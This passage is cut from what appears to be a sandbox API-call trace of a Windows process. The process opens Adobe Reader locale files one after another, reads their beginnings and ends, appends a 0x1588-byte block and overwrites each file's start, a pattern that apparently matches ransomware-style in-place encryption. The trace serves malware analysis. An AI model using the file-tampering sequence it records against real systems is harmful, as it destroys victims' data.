nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.392] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3a00 [0081.392] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.411] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3a00 [0081.412] WriteFile (in: hFile=0x1dc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.412] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0081.412] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.412] CloseHandle (hObject=0x1dc) returned 1 [0081.413] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\RdLang32.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\rdlang32.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0081.413] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0081.413] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x150600 [0081.414] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0081.414] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.414] ReleaseMutex (hMutex=0x168) returned 1 [0081.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.PTB", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.PTB", cchWideChar=12, lpMultiByteStr=0x1f7356c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.PTB", lpUsedDefaultChar=0x0) returned 12 [0081.414] ReadFile (in: hFile=0x1dc, lpBuffer=0x28c1948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x28c1948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0081.433] ReadFile (in: hFile=0x1dc, lpBuffer=0x28c1948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x28c1948*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.457] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x14f600 [0081.457] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.493] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x14f600 [0081.494] WriteFile (in: hFile=0x1dc, lpBuffer=0x286ef88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x286ef88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.494] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0081.494] WriteFile (in: hFile=0x1dc, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0081.495] WriteFile (in: hFile=0x1dc, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.495] CloseHandle (hObject=0x1dc) returned 1 [0081.496] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Spelling.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\spelling.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0084.241] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0084.241] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2a00 [0084.241] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0084.241] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.241] ReleaseMutex (hMutex=0x168) returned 1 [0084.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.PTB", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.PTB", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.PTB", lpUsedDefaultChar=0x0) returned 12 [0084.241] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.311] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1a00 [0084.312] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.350] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1a00 [0084.350] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.350] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0084.350] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0084.350] CloseHandle (hObject=0x1fc) returned 1 [0084.351] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Checkers.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\checkers.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0084.351] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0084.351] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1fa00 [0084.352] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0084.352] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.352] ReleaseMutex (hMutex=0x168) returned 1 [0084.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.RUM", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.RUM", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.RUM", lpUsedDefaultChar=0x0) returned 12 [0084.352] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0084.374] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1ea00 [0084.374] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.386] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1ea00 [0084.386] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.386] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0084.386] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0084.387] CloseHandle (hObject=0x1fc) returned 1 [0084.387] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\PDDom.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\pddom.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0084.388] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0084.388] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2c00 [0084.388] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0084.388] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.388] ReleaseMutex (hMutex=0x168) returned 1 [0084.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDDom.RUM", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0084.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDDom.RUM", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDDom.RUM", lpUsedDefaultChar=0x0) returned 9 [0084.388] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.422] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1c00 [0084.422] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.435] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1c00 [0084.435] WriteFile (in: hFile=0x1fc, lpBuffer=0x2866a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.436] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0084.436] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0084.436] CloseHandle (hObject=0x1fc) returned 1 [0084.436] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0084.437] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0084.437] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x93a4 [0084.437] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0084.437] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.438] ReleaseMutex (hMutex=0x168) returned 1 [0084.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0084.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0084.438] ReadFile (in: hFile=0x1fc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0084.449] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x83a4 [0084.449] ReadFile (in: hFile=0x1fc, lpBuffer=0x2696e18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2696e18*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.460] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x83a4 [0084.460] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.460] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0084.461] WriteFile (in: hFile=0x1fc, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0084.461] CloseHandle (hObject=0x1fc) returned 1 [0084.461] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Annots.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\annots.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0084.462] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0084.462] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7c600 [0084.462] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0084.462] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.462] ReleaseMutex (hMutex=0x168) returned 1 [0084.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.RUS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0084.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.RUS", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.RUS", lpUsedDefaultChar=0x0) returned 10 [0084.462] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0084.481] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7b600 [0084.481] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea8ee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea8ee8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.494] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7b600 [0084.495] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.495] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0084.495] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0084.496] CloseHandle (hObject=0x1fc) returned 1 [0084.497] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\MakeAccessible.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\makeaccessible.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0084.497] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0084.497] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x12800 [0084.498] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0084.498] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.498] ReleaseMutex (hMutex=0x168) returned 1 [0084.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MakeAccessible.RUS", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0084.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MakeAccessible.RUS", cchWideChar=18, lpMultiByteStr=0x1f88ba4, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MakeAccessible.RUS", lpUsedDefaultChar=0x0) returned 18 [0084.498] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.002] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x11800 [0085.009] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.010] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x11800 [0085.011] WriteFile (in: hFile=0x1fc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.011] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0085.011] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: 